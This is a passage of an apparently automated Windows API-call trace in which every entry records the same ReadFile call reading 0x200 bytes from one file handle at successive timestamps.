lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, 